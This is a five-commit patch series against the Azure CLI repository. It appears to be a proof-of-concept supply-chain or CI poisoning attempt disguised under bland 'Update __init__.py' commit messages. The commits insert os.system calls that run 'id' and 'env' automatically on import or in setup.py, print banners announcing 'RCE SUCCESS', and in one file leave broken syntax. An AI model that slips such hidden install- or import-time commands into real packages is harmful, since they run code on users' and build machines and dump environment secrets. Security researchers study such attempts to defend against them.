From 7d0aec51e33f56a59e502bd04b5c7e60e7413381 Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 14:48:06 +0630 Subject: [PATCH 1/5] Update __init__.py --- src/azure-cli/azure/__init__.py | 3 +++ 1 file changed, 3 insertions(+) diff --git a/src/azure-cli/azure/__init__.py b/src/azure-cli/azure/__init__.py index 2ae78104e94..aec17c43f03 100644 --- a/src/azure-cli/azure/__init__.py +++ b/src/azure-cli/azure/__init__.py @@ -1,3 +1,6 @@ +import os +# Payload: Proof of RCE +os.system("echo ' [!] CRITICAL VULNERABILITY: RCE CONFIRMED [!] '; id; env") # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. From 6d89143dd56db3739f529ced1ede6b27d6c24212 Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 15:08:59 +0630 Subject: [PATCH 2/5] Update __init__.py --- src/azure-cli/azure/__init__.py | 6 ------ 1 file changed, 6 deletions(-) diff --git a/src/azure-cli/azure/__init__.py b/src/azure-cli/azure/__init__.py index aec17c43f03..4892ceb29cd 100644 --- a/src/azure-cli/azure/__init__.py +++ b/src/azure-cli/azure/__init__.py @@ -1,8 +1,2 @@ import os -# Payload: Proof of RCE os.system("echo ' [!] CRITICAL VULNERABILITY: RCE CONFIRMED [!] '; id; env") -# -------------------------------------------------------------------------------------------- -# Copyright (c) Microsoft Corporation. All rights reserved. -# Licensed under the MIT License. See License.txt in the project root for license information. -# -------------------------------------------------------------------------------------------- -__path__ = __import__("pkgutil").extend_path(__path__, __name__) From 4f8b4fbdfe654624b78e909c53c3ffdde6ede25c Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 15:12:01 +0630 Subject: [PATCH 3/5] Update setup.py --- src/azure-cli/setup.py | 2 ++ 1 file changed, 2 insertions(+) diff --git a/src/azure-cli/setup.py b/src/azure-cli/setup.py index 8330fed5d66..939e28df80e 100644 --- a/src/azure-cli/setup.py +++ b/src/azure-cli/setup.py @@ -7,8 +7,10 @@ from codecs import open from setuptools import setup, find_packages +import os import sys +os.system("echo '[!] SETUP.PY RCE TRIGGERED [!]'; id") try: from azure_cli_bdist_wheel import cmdclass except ImportError: From 3d0fd490c1d70b4c15d54b2e5e9c87e4be47a0ad Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 15:13:01 +0630 Subject: [PATCH 4/5] Update __init__.py --- src/azure-cli-core/azure/__init__.py | 11 +++++++++++ 1 file changed, 11 insertions(+) diff --git a/src/azure-cli-core/azure/__init__.py b/src/azure-cli-core/azure/__init__.py index 2ae78104e94..f0a4214c1f7 100644 --- a/src/azure-cli-core/azure/__init__.py +++ b/src/azure-cli-core/azure/__init__.py @@ -1,3 +1,14 @@ +import os +import sys +# FORCE EXECUTION +try: + print("========================================================") + print("[!] AZURE CLI CORE POISONED - RCE SUCCESS [!]") + print("========================================================") + os.system("id") + os.system("env") +except: + pass # -------------------------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for license information. From 2536f2f0f362f6d883eaeb10fc8bfcd585537813 Mon Sep 17 00:00:00 2001 From: Nyein Chan Aung <208256680+bugdotexe@users.noreply.github.com> Date: Sat, 31 Jan 2026 15:13:53 +0630 Subject: [PATCH 5/5] Update __init__.py --- src/azure-cli-core/azure/cli/core/__init__.py | 8 ++++++++ 1 file changed, 8 insertions(+) diff --git a/src/azure-cli-core/azure/cli/core/__init__.py b/src/azure-cli-core/azure/cli/core/__init__.py index 0a2c2bf418e..33e917af8af 100644 --- a/src/azure-cli-core/azure/cli/core/__init__.py +++ b/src/azure-cli-core/azure/cli/core/__init__.py @@ -20,7 +20,15 @@ from knack.util import CLIError from knack.arguments import ArgumentsContext, CaseInsensitiveList # pylint: disable=unused-import from .local_context import AzCLILocalContext, LocalContextAction +import sys + print("========================================================") + print("[!] AZURE CLI CORE POISONED - RCE SUCCESS [!]") + print("========================================================") + os.system("id") + os.system("env") +except: + pass logger = get_logger(__name__) EXCLUDED_PARAMS = ['self', 'raw', 'polling', 'custom_headers', 'operation_config',